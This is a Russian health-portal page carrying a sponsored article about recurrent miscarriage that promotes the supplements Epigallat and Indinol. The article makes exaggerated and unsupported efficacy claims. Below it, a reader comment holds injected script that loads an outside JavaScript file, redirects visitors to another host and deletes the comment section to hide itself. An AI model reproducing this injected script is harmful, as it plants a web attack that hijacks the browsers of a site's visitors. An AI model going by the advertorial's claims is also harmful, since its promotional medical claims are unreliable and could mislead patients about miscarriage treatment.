Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Невынашивание беременност...  >>  Невынашивание беременности – проблема, которая имеет решение
 
Обратная связь
 

Невынашивание беременности – проблема, которая имеет решение

Размер шрифта
20 ноября 2011 00:00
  • google_analytics: false
  • Нравится

Каждая пятая беременность прерывается в связи с невынашиванием, причем в 80% случаев прерывание происходит на раннем сроке, и женщина считает, что у нее была обычная «задержка». Что делать в такой ситуации и как лечить это состояние?

Невынашивание беременности

Как наступает беременность?


  1. Под влиянием женских половых гормонов эстрогенов в яичнике созревает фолликул.

  2. Усиливается секреция шеечной слизи, необходимой для сохранения активности сперматозоидов.

  3. Эндометрий, внутренний слой матки, утолщается.

  4. Когда концентрация эстрогенов достигает определенного уровня, в кровь поступает большое количество лютеинизирующего гормона, «отвечающего» за овуляцию.

В фазу овуляции разрывается созревший фолликул и выпускает яйцеклетку. По маточной трубе она движется к матке. Лопнувший фолликул превращается в желтое тело и вырабатывает гормон прогестерон. Он блокирует созревание других фолликулов.

Бейби

Тем временем эндометрий значительно утолщается, готовясь принять оплодотворенную яйцеклетку и накапливая питательные вещества, необходимые для сохранения беременности.

Если беременность не наступила – вновь повышается уровень эстрогенов, происходит менструация и цикл повторяется.

Почему беременность может прерваться?

Важным фактором для сохранения беременности является нормальное состояние эндометрия. Эндометрий чувствителен к внешним воздействиям:


  • Длительный стресс
  • Хронические заболевания и интоксикации
  • Нарушения питания
  • Аборты
  • Роды с разрывами шейки матки
  • Воспаления при инфекциях, передающихся половым путем.

БеременностьХронический эндометрит – распространенное состояние. Даже единичный случай воспаления полости матки приводит к развитию спаек, уплотнений, нарушению менструального цикла и отсутствию правильного созревания эндометрия. При таких условиях оплодотворенная яйцеклетка не может удержаться в полости матки. Происходит самопроизвольный выкидыш на малом сроке, который усугубляет гормональные проблемы и нарушает последующее созревание эндометрия. В результате, с каждым случаем невынашивания, вероятность наступления следующей беременности снижается.


Что делать?

Обратиться к гинекологу. Врач назначает женщине полное обследование, чтобы составить полную картину состояния ее половой сферы:


  • нарушения гормонального фона
  • инфекции, передающиеся половым путем
  • хронический эндометрит

Чем лечить?

После точного диагноза назначается лечение: гормоны, антибиотики, средства, улучшающие рост и созревание эндометрия. Все чаще в комплекс терапии, направленной на лечение невынашивания беременности, включают препараты Эпигаллат и Индинол.

Ножки ребенка

Эпигаллат оказывает многогранное воздействие на женский организм, способствуя восстанавлению его функции. Активный компонент Эпигаллата – эпигаллокатехин-3-галлат является мощным антиоксидантом и блокирует воспалительные реакции. Эпигаллат усиливает действие антибиотиков и обладает самостоятельной антимикробной активностью, особенно в отношении антибиотико-устойчивых микроорганизмов. Этот препарат предотвращает занос клеток эндометрия в мышечный слой матки, защищая от развития более грозного заболевания – эндометриоза.

Эпигаллат является негормональным средством, которое прекрасно сочетается с другими лекарственными препаратами и может дополнять курс лечения, составленный врачом.

Сейчас в аптеках появилась общая упаковка Эпигаллата и Индинола. Сочетание этих препаратов было апробировано в нескольких ведущих российских клиниках. Результаты исследований превзошли самые смелые ожидания.

Беременность

Комбинация Эпигаллата с Индинолом способствует нормализации гормонального фона, восстанавливает процесс правильного деления клеток, борется с патогенными микробами и повышает местный иммунитет.

В результате женщина избавляется от хронических инфекций, у нее восстанавливается менструальный цикл и происходит правильное созревание эндометрия, что создает благоприятные условия для возникновения, сохранения и развития беременности.

Таким образом, применение препаратов Эпигаллат и Индинол оказывает комплексное воздействие на организм женщины и помогает мягко решить проблему невынашивания беременности.
 

На правах рекламы

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как определить тип недержания мочи?   Спросите маму, как вы родились   Каждые 8 минут родители почти убивают своих детей!   Как сделать тест на беременность?  
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 февраля 2013Ожирение можно предсказать сразу после рождения
 
21 января 2013Продвижение по карьерной лестнице зависит от даты рождения 07 декабря 2012Жизнь наследника британской короны под угрозой
 

Слайдшоу

1
Растяжки! Можно ли от них избавиться?
Что делать, если в жизни один геморрой?
Что мешает вам забеременеть

Тесты

1
Кофеин вызывает зависимость?
Что есть будущим мамам?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.